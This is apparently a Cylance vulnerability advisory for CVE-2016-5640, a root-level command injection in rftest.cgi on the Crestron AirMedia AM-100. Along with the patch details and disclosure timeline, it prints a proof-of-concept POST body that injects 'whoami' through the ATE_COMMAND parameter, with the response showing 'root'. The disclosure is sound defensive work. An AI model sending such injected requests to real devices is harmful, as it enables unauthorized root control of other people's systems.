Cylance identified a vulnerability in the Crestron AirMedia AM-100, which could allow an unauthenticated entity to execute arbitrary commands on affected devices. The unauthenticated user must be able to access the web server on the affected devices.
The Crestron AirMedia AM-100 allows users to "wirelessly present PowerPoint®, Excel®, Word, and PDF documents, as well as photos, on the room display from their personal iOS® or Android™ mobile device" or desktop/laptop. (via http://www.crestron.com/microsites/airmedia-mobile-wireless-hd-presentations).
- Crestron AirMedia AM-100 (firmware v1.1.1.11 - v1.2.1)
An unauthenticated entity may be able to execute arbitrary commands on the affected AM-100 as superuser ("root").
- Cylance Identifier: CLVA-2016-05-002
- CVE Identifier: CVE-2016-5640
A command injection vulnerability exists in rftest.cgi on the AM-100 embedded web server. The ATE_COMMAND POST parameter specifies the path to a command for the underlying OS to execute. By default, the value of this parameter is /sbin/iwpriv; however, the value of this parameter can be a relative or absolute path to any arbitrary command on the underlying OS.
Attackers may execute unauthorized commands, which could then be used to disable the software, or read and modify data for which the attacker does not have permissions to access directly. Additionally, as the embedded web server runs as root, subsequent commands/processes will also run as root, providing unfettered access to the system.
An unauthenticated entity with access to the AM-100 embedded web server could send HTTP POST data to rftest.cgi, specifying any arbitrary command to be executed.
Crestron has released firmware version 1.4.0.13 to address this issue. Affected users should update the firmware of their AM-100 as soon as possible. Crestron partners can find the latest firmware at http://www.crestron.com/products/model/AM-100
- Zach Lanier, Director of Research, Cylance
- Example of a benign/normal
POSTrequest body forrftest.cgi:
POST https://[AM-100-ADDRESS]/cgi-bin/rftest.cgi?lang=en&src=AwServicesSetup.html&[TOKEN] HTTP/1.1
...
ATE_COMMAND=%2Fsbin%2Fiwpriv+ra0+set+ATE%3DATESTART%3B%2Fsbin%2Fiwpriv+ra0+set+ATETXLEN%3D24%3B%2Fsbin%2Fiwpriv+ra0+set+ATE%3DTXCONT%3B&ATECHANNEL=&ATETXLEN=24&ATETXCNT=&ATETXMODE=&ATETXBW=&ATETXGI=&ATETXMCS=&ATETXANT=&ATERXANT=&ATERXFER=&ResetCounter=&ATEAUTOALC=&ATEIPG=&ATEPAYLOAD=&ATE=TXCONT
- Example of expected response:
HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 26 Oct 2005 19:07:53 GMT
Server: lighttpd/1.4.35-devel-4f1e285
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Cache-control" content="no-cache">
<title>Crestron AirMedia</title>
...
- Example of malicious
POSTrequest body forrftest.cgi, specifying thewhoamicommand for theATE_COMMANDparameter:
ATE_COMMAND=whoami&ATECHANNEL=&ATETXLEN=24&ATETXCNT=&ATETXMODE=&ATETXBW=&ATETXGI=&ATETXMCS=&ATETXANT=&ATERXANT=&ATERXFER=&ResetCounter=&ATEAUTOALC=&ATEIPG=&ATEPAYLOAD=&ATE=TXCONT
- Response (note response contains
root, indicating successful execution ofwhoami, as well as identifying that the web server runs as superuser):
HTTP/1.1 200 OK
Date: Wed, 26 Oct 2005 20:50:35 GMT
Server: lighttpd/1.4.35-devel-4f1e285
root
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...
- Discovery Date: 2016-05-12
- Vendor Notification Date: 2016-05-19
- CERT/CC Contact Date: 2016-05-27
- Vendor Acknowledgement Date: 2016-06-06
- Patch Release Date: 2016-08-01
- Public Disclosure Date: 2016-08-01